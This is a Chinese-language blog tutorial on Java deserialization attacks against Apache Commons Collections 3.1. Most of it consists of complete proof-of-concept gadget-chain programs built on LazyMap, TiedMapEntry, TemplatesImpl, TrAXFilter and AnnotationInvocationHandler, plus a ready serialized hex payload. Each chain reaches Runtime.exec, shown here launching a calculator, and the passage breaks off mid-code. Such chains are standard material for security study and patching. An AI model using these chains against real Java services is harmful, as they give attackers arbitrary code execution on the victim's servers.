java反序列化漏洞_CC链

最新推荐文章于 2025-11-25 12:11:25 发布
原创 最新推荐文章于 2025-11-25 12:11:25 发布 · 432 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #web安全

java反序列化漏洞_CC链

Apache Commons Collections 是一个广泛应用于 Java 应用开发的库,它对 Java 的 Collection(集合)相关类对象进行了封装,提供了很多强大的数据结构类型和集合工具类。

Apache Commons Collections 库中的 transform 方法是一个非常实用的工具,可以将一个对象转换到另一个对象,CC链的一切都是基于transform 方法去触发的。

环境依赖

jdk 8u66 + commons-collections 3.1

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>

原理

LazyMap

借助 LazyMap 的延迟加载机制(lazyMap.get)去加载构造的恶意Transformer 链从而触发代码执行。

  • LazyMap 的延迟加载机制

    LazyMap存在一个方法

    public static Map decorate(Map map, Factory factory)

    其作用是将一个map给装饰成LazyMap,当查找map时key不存在,则会自动调用factory创建对应的值

  • Transformer 链

    Transformer链依赖于ChainedTransformer实现,大致逻辑如下:

    public Object transform(Object object) {
    for (Transformer transformer : transformers) {
        object = transformer.transform(object);
    }
    return object;
}

    第一个Transformer接收原始输入,最终返回最后一个Transformer的输出。

    内置的Transformer实现包括以下几种(\org\apache\commons\collections\functors):

    • ConstantTransformer:返回固定常量,不依赖输入
    • InvokerTransformer:通过反射调用方法
    • ChainedTransformer:组合多个 Transformer

LazyMap的直接调用:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);

        lazyMap.get("test-key");

    }
}

当执行到lazyMap.get(“test-key”)就会触发恶意transformerChain的调用从而执行任意代码

transformerChain的调用在LazyMap.get中的factory.transform(key)

public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }

compare

TransformingComparator的compare会在比较对象前使用this.transformer.transform做对象转换从而触发代码执行。

直接调用compare:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.comparators.TransformingComparator;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;


public class CommonsCollections2 {
    public static void main(String[] args){
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        TransformingComparator comparator=new TransformingComparator(transformerChain);
        comparator.compare(null,null);

    }
}

当调用TransformingComparator的compare时触发:

public int compare(Object obj1, Object obj2) {
        Object value1 = this.transformer.transform(obj1);
        Object value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

在this.transformer.transform触发代码执行

TemplatesImpl

以下是借助TemplatesImpl加载恶意字节码触发命令执行的代码:

package org.example.CommonsCollections;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.example.tools.ReflectionUtils;

import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;

public class TemplatesImpTest {
    public static void main(String[] args) throws TransformerConfigurationException, CannotCompileException, IOException, NotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        // 直接创建一个全新的类,不需要依赖现有类
        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        // 设置要执行的命令
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        // 添加静态初始化块,并在其中插入命令
        cc.makeClassInitializer().insertBefore(cmd);

        // 设置父类(根据需要替换为实际需要的父类)
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        // 生成字节码
        byte[] evilCode = cc.toBytecode();

        // 转换为Base64
//        String evilCodeBase64 = Base64.getEncoder().encodeToString(evilCode);
//        System.out.println("生成的恶意类Base64编码: " + evilCodeBase64);

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());

        templatesImp.newTransformer();

    }
}

触发命令执行是在:

image-20251015215508388

image-20251015215559410

image-20251015215624987

因此尝试找到newTransformer的调用然后去构造链即可

transient

在 Java 中,当一个类实现了 Serializable 接口时,其对象可以被转换为字节流(序列化),以便存储到磁盘或通过网络传输,之后还能从字节流恢复为原来的对象(反序列化)。

transient 关键字的核心作用,就是阻止被修饰的成员变量参与序列化过程。

当一个类成员标记了 transient,但是重写了writeObject来处理该类成员,那么实际上还是完成了该类成员的序列化操作

动态代理

以下是一个动态代理的示例代码:

import java.io.IOException;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

public class test {

    // 目标接口
    interface UserService {
        void save(String name);
    }

    // 目标对象(实现接口)
    static class UserServiceImpl implements UserService {
        @Override
        public void save(String name) {
            System.out.println("保存用户:" + name);
        }
    }

    // 调用处理器
    static class LogHandler implements InvocationHandler {
        private Object target; // 目标对象

        public LogHandler(Object target) {
            this.target = target;
        }

        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            // 前置增强:打印日志
            System.out.println("方法调用前:" + method.getName());
            // 调用目标对象的原始方法
            Object result = method.invoke(target, args);
            // 后置增强:打印日志
            System.out.println("方法调用后:" + method.getName());
            return result;
        }
    }

    public static void main(String[] args) throws IOException, ClassNotFoundException {
        UserService target = new UserServiceImpl();
        // 2. 创建调用处理器(关联目标对象)
        InvocationHandler handler = new LogHandler(target);
        // 3. 动态生成代理对象(实现 UserService 接口)
        UserService proxy = (UserService) Proxy.newProxyInstance(
                target.getClass().getClassLoader(), // 类加载器
                target.getClass().getInterfaces(),  // 目标对象实现的接口
                handler                             // 调用处理器
        );
        // 4. 调用代理对象的方法(实际会转发到 invoke() 方法)
        proxy.save("张三");
    }
}

以上使用动态代理调用方法的链:

(UserService)proxy.save-->LogHandler.invoke-->UserServiceImpl.save

复现

LazyMap+TiedMapEntry

构造payload:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");
        System.out.println(DeserializationTools.serializeToHex(entry));
    }
}

触发:

package org.example.CommonsCollections;

import org.example.tools.DeserializationTools;

import java.io.IOException;

public class test {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        Object obj = DeserializationTools.deserializeFromHex("aced0005737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740008746573742d6b65797372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001900000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00197371007e00117571007e001600000002707571007e001600000000740006696e766f6b657571007e001900000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00167371007e0011757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e00190000000171007e001e737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878");
        obj.hashCode();
    }
}

要触发漏洞,那么TiedMapEntry需要直接或间接地调用LazyMap.get,比如TiedMapEntry中使用getValue调用了Map.get,这将间接调用LazyMap.get

这就可以得到几种可以利用的方法:

  • obj.hashCode();

  • obj.toString();

  • obj.equals(entry);其中entry必须是Map.Entry对象(或implements了Map.Entry的类对象如AbstractMap.SimpleEntry)且不能为空

    Map.Entry entry = new Map.Entry() {
            @Override
            public Object getKey() {
                return null;
            }

            @Override
            public Object getValue() {
                return null;
            }

            @Override
            public Object setValue(Object value) {
                return null;
            }
        };
        
AbstractMap.SimpleEntry entry = new AbstractMap.SimpleEntry<>("abc", 1);

但很多时候可能不会存在手动调用hashcode、toString和equal的情况,而TiedMapEntry没有重写readObject,不存在反序列化调用这些方法的可能,因此需要找到一些满足以下条件的类:

  • 可以对TiedMapEntry进行包装
  • 类支持序列化,且类中的成员变量所对应的类支持序列化(类不包括基本数据类型)
  • 类重写了readObject且在其中会调用hashcode、toString和equal

由此可以找到一些类满足这些条件,比如hashmap类(继承了hashmap的类同样可以,如MultiHashMap)。

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");
        
        // 
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new HashMap());
        HashMap hashMap = new HashMap();
        hashMap.put(entry, null);
        field.set(entry, lazyMap);
        String s = DeserializationTools.serializeToHex(hashMap);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);
        
    }
}

注意,需要借助临时修改entry的map字段,在完成put操作后再修改map为lazyMap,避免hashMap.put操作时触发hashcode从而无法得到payload

ConcurrentHashMap类:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;


public class CommonsCollections {
    public static void main(String[] args) throws IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");

        // 临时修改entry的map字段,在完成put操作后再修改map为lazyMap,避免put操作时触发hashcode从而无法得到payload
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new ConcurrentHashMap());
        ConcurrentHashMap concurrentHashMap = new ConcurrentHashMap();
        concurrentHashMap.put(entry, "test");
        field.set(entry, lazyMap);
        String s = DeserializationTools.serializeToHex(concurrentHashMap);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

前面是以Rutime类+InvokerTransformer作为底座,但实际上还可以使用TemplateImpl+InvokerTransformer作为底座:

package org.example.CommonsCollections;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;
import org.example.tools.ReflectionUtils;

import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException, CannotCompileException, NotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        // 直接创建一个全新的类,不需要依赖现有类
        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        // 设置要执行的命令
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        // 添加静态初始化块,并在其中插入命令
        cc.makeClassInitializer().insertBefore(cmd);

        // 设置父类(根据需要替换为实际需要的父类)
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        // 生成字节码
        byte[] evilCode = cc.toBytecode();

        // 转换为Base64
//        String evilCodeBase64 = Base64.getEncoder().encodeToString(evilCode);
//        System.out.println("生成的恶意类Base64编码: " + evilCodeBase64);

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templatesImp),
                new InvokerTransformer("newTransformer",null,null),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");

        //
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new HashMap());
        HashMap hashMap = new HashMap();
        hashMap.put(entry, null);
        field.set(entry, lazyMap);
        String s = DeserializationTools.serializeToHex(hashMap);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

TemplateImpl+InstantiateTransformer作为底座:

package org.example.CommonsCollections;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;
import org.example.tools.ReflectionUtils;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException, CannotCompileException, NotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        // 直接创建一个全新的类,不需要依赖现有类
        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        // 设置要执行的命令
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        // 添加静态初始化块,并在其中插入命令
        cc.makeClassInitializer().insertBefore(cmd);

        // 设置父类(根据需要替换为实际需要的父类)
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        // 生成字节码
        byte[] evilCode = cc.toBytecode();

        // 转换为Base64
//        String evilCodeBase64 = Base64.getEncoder().encodeToString(evilCode);
//        System.out.println("生成的恶意类Base64编码: " + evilCodeBase64);

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImp})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");

        //
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new HashMap());
        HashMap hashMap = new HashMap();
        hashMap.put(entry, null);
        field.set(entry, lazyMap);
        String s = DeserializationTools.serializeToHex(hashMap);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

TrAXFilter的构造函数中就调用了newTransformer,所以可以用TrAXFilter封装一下,根据这种思路,可以尝试使用TransformerFactoryImpl封装一下:

package org.example.CommonsCollections;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;
import org.example.tools.ReflectionUtils;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException, CannotCompileException, NotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        // 直接创建一个全新的类,不需要依赖现有类
        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        // 设置要执行的命令
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        // 添加静态初始化块,并在其中插入命令
        cc.makeClassInitializer().insertBefore(cmd);

        // 设置父类(根据需要替换为实际需要的父类)
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        // 生成字节码
        byte[] evilCode = cc.toBytecode();

        // 转换为Base64
//        String evilCodeBase64 = Base64.getEncoder().encodeToString(evilCode);
//        System.out.println("生成的恶意类Base64编码: " + evilCodeBase64);

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TransformerFactoryImpl.class),
                new InstantiateTransformer(null, null),
                new InvokerTransformer("newTransformerHandler",new Class[]{Templates.class},new Object[]{templatesImp}),

        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");

        //
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new HashMap());
        HashMap hashMap = new HashMap();
        hashMap.put(entry, null);
        field.set(entry, lazyMap);
        String s = DeserializationTools.serializeToHex(hashMap);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

基于LazyMap和TiedMapEntry的链还有很多,比如:

被调用链 #275(节点数:3) ---
    java.lang.Object.equals(java.lang.Object.class:-1)
        类特性:[重写readObject]org.apache.commons.collections.ReferenceMap
        org.apache.commons.collections.ReferenceMap.put(java.lang.Object.class:546)
            类特性:[重写readObject]org.apache.commons.collections.ReferenceMap
            org.apache.commons.collections.ReferenceMap.readObject(org.apache.commons.collections.ReferenceMap.class:342)

被调用链 #2400(节点数:3) ---
    java.lang.Object.equals(java.lang.Object.class:-1)
        类特性:[支持克隆][支持序列化][重写readObject]org.apache.commons.collections.map.Flat3Map
        org.apache.commons.collections.map.Flat3Map.put(java.lang.Object.class:292)
            类特性:[支持克隆][支持序列化][重写readObject]org.apache.commons.collections.map.Flat3Map
            org.apache.commons.collections.map.Flat3Map.readObject(org.apache.commons.collections.map.Flat3Map.class:996)

poc都类似:

package org.example.CommonsCollections;

import org.apache.commons.collections.MapIterator;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.*;
import org.example.tools.DeserializationTools;

import javax.swing.*;
import java.awt.event.ActionEvent;
import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

import static org.example.tools.DeserializationTools.bytesToHex;
import static org.example.tools.ReflectionUtils.setFieldValue;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException, NoSuchFieldException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new Flat3Map());
        Flat3Map refMap = new Flat3Map();
        refMap.put(entry, 1);
        field.set(entry, lazyMap);

        String s = DeserializationTools.serializeToHex(refMap);
        System.out.println(s);

        DeserializationTools.deserializeFromHex(s);

    }
}

LazyMap+AnnotationInvocationHandler动态代理

此处基于AnnotationInvocationHandler和动态代理完成LazyMap.get的间接调用。

直接调用proxy:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();


        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


  
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, lazyMap);

        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);
        proxyMap.entrySet();


    }
}

AnnotationInvocationHandler接收两个入参,分别是注解类型和一个存储注解成员值的 Map,其中lazyMap会被赋值给成员memberValues

当调用entrySet时,会触发AnnotationInvocationHandler中的invoke进而触发this.memberValues.get,从而触发lazyMap.get

image-20251014211404706

然后在AnnotationInvocationHandler中的readObject中可以发现调用了.entrySet,让memberValues=proxyMap即可:

image-20251015160243235

因此可以直接构造一个AnnotationInvocationHandler序列化对象:

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.example.tools.DeserializationTools;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
//import sun.reflect.annotation.AnnotationParser;


public class CommonsCollections {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
